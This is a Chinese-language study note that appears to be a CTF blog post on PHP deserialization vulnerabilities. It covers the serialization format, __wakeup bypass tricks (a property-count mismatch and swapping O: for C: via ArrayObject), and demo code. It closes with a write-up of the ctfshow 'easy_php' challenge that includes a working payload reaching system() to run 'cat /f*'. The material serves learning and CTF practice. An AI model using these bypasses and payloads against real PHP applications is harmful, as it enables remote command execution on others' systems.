01什么是序列化和反序列化

序列化是将对象转化为字符串以便存储的一种方式。而反序列化恰好是序列化的逆过程，反序列化会将字符串转化为对象供程序使用。

常见的php系列化和反系列化方式主要有：serialize，unserialize；json_encode，json_decode。

02什么是反序列化漏洞

当程序在进行反序列化时，会自动调用一些函数，例如wakeup(),destruct()等函数，但是如果传入函数的参数可以被用户控制的话，用户可以输入一些恶意代码到函数中，从而导致反序列化漏洞。

03序列化格式中的字母含义：

a - array

b - boolean

d - double

i - integer

o - common object

r - reference

s - string

C - custom object

O - class

N - null

R - pointer reference

U - unicode string

04魔术方法

例题1(几乎不会涉及较复杂绕过)：[SWPUCTF 2021 新生赛]ez_unserialize

 

__wakeup()方法漏洞

漏洞影响版本：PHP5 < 5.6.25 PHP7 < 7.0.10

影响原因：若在对象的魔法函数中存在_wakeup方法，那么之后在调用unserilize()方法进行反序列化之前则会先调用 _wakeup方法

属性个数不匹配

利用方法：当序列化字符串中表示对象属性个数值大于真是属性个数时会跳出wakeup执行

方法原理：反序列化是一个正向检索的函数，虽然对于整体来说，数量不符，无法完成反序列化，但是可以尽可能检索能够完成反序列化的目标，所以这里数量改多了，会先依次反序列化已有个单位，直到无法检索到下一个目标才判定反序列化失败。 所以当然可以触发__destruct(),完成前面属性的赋值。

eg:[SWPUCTF 2021 新生赛]no_wakeup

 

unserialize3 反序列字符串绕过

C绕过wakeup

O标识符代表对象类型，而C标识符代表类名类型。如果将O替换为C，则在反序列化时会将其解释为一个新的类名字符串，从而创建一个新的类而不是对象。因为这个新的类没有被序列化过，所以它没有任何属性或方法。这样一来，在反序列化时，__wakeup魔术方法就不会

被自动调用。

跟着大佬走一遍（这部分几乎完全跟着大佬博客走着学了一遍）：

引入

 //引入<?phpclass AAA {​public function __wakeup() {echo "__wakeup";}​public function __construct(){echo "__construct".PHP_EOL;//换行符}​public function __destruct(){echo "__destruct".PHP_EOL;}}​$a = serialize(new AAA());$mod = str_replace("O:","C:",$a);//这里是将O:替换成c:为了绕过题目中不允许的地方echo $mod.PHP_EOL;​$unserialized = unserialize($mod);var_dump($unserialized);?>

 //回显__construct__destruct C:3:"AAA":0:{}Warning: Class AAA has no unserializer in E:\workspace2024\learn_php\test02.php on line 21object(AAA)#1 (0) { } __destruct

O被替换成了C以后，生成的序列化字符串被认为可调用

扩展

C这个标识符，其实也是代表实现了 Serializable接口的类，因为实现Serializable接口，我们必须要重写serialize和unserialize方法

 ​<?php//定义的AAAA的类可以实现Serializable接口，意味着该实例可以被序列化和反序列化class AAAA implements Serializable{public $name="aa";public $age="bb";public function serialize() {//return serialize(array('name' => $this->name,//这是一个键值对。键是字符串 'name'，值是从当前对象的 $name 属性中取得的。$this 是PHP中的一个特殊变量，它引用当前对象。        'age' => $this->age));}public function unserialize($data) {$data = unserialize($data);$this->name = $data['name'];//从反序列化后的数组$data中提取'name'键的值，并将其赋值给当前对象的$name属性。$this->age = $data['age'];}public function __construct(){echo "__construct\n";}public function __wakeup() {echo "__wakeup()";}public function __destruct(){echo 2222222;}}$a = new AAAA();$b = serialize($a);echo $b.PHP_EOL;$c = unserialize($b);var_dump($c);

 //回显Deprecated: AAAA implements the Serializable interface, which is deprecated. Implement __serialize() and __unserialize() instead (or in addition, if support for old PHP versions is necessary) in E:\workspace2024\learn_php\test02.php on line 2__construct C:4:"AAAA":45:{a:2:{s:4:"name";s:2:"aa";s:3:"age";s:2:"bb";}} object(AAAA)#2 (2) { ["name"]=> string(2) "aa" ["age"]=> string(2) "bb" } 22222222222222

利用

 ​<?php​// 获取所有已定义的类$classes = get_declared_classes();$serializableClasses = [];​// 遍历所有类foreach ($classes as $class) {// 创建反射类对象$reflection = new ReflectionClass($class);// 判断类是否实现了 Serializable 接口if ($reflection->implementsInterface('Serializable')) {// 将实现了 Serializable 接口的类添加到数组中$serializableClasses[] = $class;}}​// 输出实现了 Serializable 接口的所有原生类foreach ($serializableClasses as $class) {echo $class . PHP_EOL;}?>

这里使用第一个，先生成一个，放到反序列化看看

 <?phpclass AAAA{public $name=1;public $age=2;}$a = new ArrayObject;$a -> a = new AAAA;echo serialize($a);//C:11:"ArrayObject":73:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:4:"AAAA":2:{s:4:"name";i:1;s:3:"age";i:2;}}}

 <?phpclass AAAA{public $name="aa";public $age="bb";​public function __wakeup() {echo "__wakeup\n";}public function __construct(){echo "__construct\n";}​public function __destruct(){echo 2222222;}}​$c = unserialize('C:11:"ArrayObject":73:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:4:"AAAA":2:{s:4:"name";i:1;s:3:"age";i:2;}}}');var_dump($c);?>

最后发现并没有绕过wakeup，但是也可以当作一种绕过。emmm

eg：ctfshow愚人杯 easy_php

ctfshow愚人杯 easy_php

 <?php​error_reporting(0);highlight_file(__FILE__);​class ctfshow{​public function __wakeup(){die("not allowed!");}​public function __destruct(){system($this->ctfshow);}​}​$data = $_GET['1+1>2'];​if(!preg_match("/^[Oa]:[\d]+/i", $data)){//说明不可以使用O:,或者a：开头unserialize($data);}​?>

wp:

 <?phpclass ctfshow{public $ctfshow="cat /f*";//列出所有以f开头的文件
}
$A=new ArrayObject;//ArrayObject 是 PHP 的一个类，用于实现数组作为对象的接口。
$A->a=new ctfshow;
echo serialize($A);//输出代表 $A 对象的状态。这个字符串包含了 $A 对象及其属性 a（该属性是一个 ctfshow 对象）的信息。
?>

不知道为什么自己的一直没有实现，最后经大佬指点发现是php编译器问题最后换了一个方式找到答案。

 C:11:"ArrayObject":75:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:7:"ctfshow":1:{s:7:"ctfshow";s:7:"cat /f*";}}}

 payload:?1%2B1%3E2=C:11:"ArrayObject":75:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:7:"ctfshow":1:{s:7:"ctfshow";s:7:"cat /f*";}}}

参考：反序列化漏洞详解-CSDN博客v99pc_search_result_base8&utm_term=%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96&spm=1018.2226.3001.4187

PHP序列化和反序列化-CSDN博客v99pc_search_result_base8&spm=1018.2226.3001.4187

PHP反序列化-__wakeup()方法漏洞（CVE-2016-7124）_wakeup的漏洞-CSDN博客

ctfshow 第三届愚人杯 easy_php_愚人杯3rd [easy_php]-CSDN博客